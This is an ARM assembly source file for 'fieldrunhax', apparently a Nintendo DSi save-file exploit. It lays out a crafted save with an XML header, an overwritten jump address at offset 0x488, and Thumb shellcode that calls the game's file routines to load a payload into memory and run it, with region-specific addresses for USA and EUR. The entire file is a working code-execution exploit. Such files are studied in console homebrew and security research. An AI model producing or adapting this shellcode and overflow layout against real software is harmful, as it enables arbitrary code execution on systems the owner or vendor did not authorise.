dsi/exploits/fieldrunhax/fieldrunhax.s

.arch armv5te
.fpu softvfp
.eabi_attribute 23, 1
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 1
.eabi_attribute 30, 2
.eabi_attribute 18, 4

.global _start
.section .init

#define REGION_USA 45
#define REGION_EUR 56

#define	REG_BASE	0x04000000

#define savpath 0x0207d6a0

#if REGCODE==REGION_USA

#define JUMPADR 0x02076bb4//This jumps to some code with the func ptr at *(r0+8). This is a string buffer with the strncpy'd data from stack, in the format of: "1. "<string data> Thus it executes ascii "1. ", then the shellcode, though it executes that ascii w/o crashing.

#define dFS_InitCtx 0x2059878

#define dFS_Open 0x02059a2c
#define dFS_Close 0x02059ab0

#define dFS_Read 0x02059bd4
#define dFS_Seek 0x02059ba8

#elif REGCODE==REGION_EUR

#define JUMPADR 0x2076bbc

#define dFS_InitCtx 0x2059880

#define dFS_Open 0x2059a34
#define dFS_Close 0x2059ab8

#define dFS_Read 0x2059bdc
#define dFS_Seek 0x2059bb0

#endif

_start:
.incbin "xmlhdr.bin"

shellcode:
.arm
add r1, pc, #1
bx r1

.thumb

mov r0, sp @ This game replaces "/t" 0x09 bytes with ' ' 0x20. Thus we must avoid using instructions with that data.
ldr r4, =dFS_InitCtx
blx r4

mov r0, sp
ldr r1, =savpath
mov r2, #1
ldr r4, =dFS_Open
blx r4

mov r0, sp
mov r4, #0x10
lsl r4, #8
add r4, #0x30 @ 0x1030

mov r3, #0x0020
lsl r3, #4
add r3, #0x20
lsl r3, #16 @ 0x02200000
mov r7, r3
sub r3, r4
mov r1, r3
mov r2, #0xd4
lsl r2, #8
add r2, #4 @ 0xd404
add r2, r4
@ldr r4, =dFS_Read
ldr r4, =dFS_Seek
add r4, #0x2c
blx r4

mov r0, sp
@ldr r4, =dFS_Close
ldr r4, =dFS_Open
add r4, #0x84
blx r4

mov r1, r7
bx r1

fail_lp:
b fail_lp

.byte 0x55, 0x55 @ padding
.pool

.space (_start + 0x488) - .
.word JUMPADR

.incbin "xmlfooter.bin"

.space (_start + 0x1030) - .

.incbin "../generictwlpayload/generictwlpayload.bin"

.space (_start + 0xe7c4) - .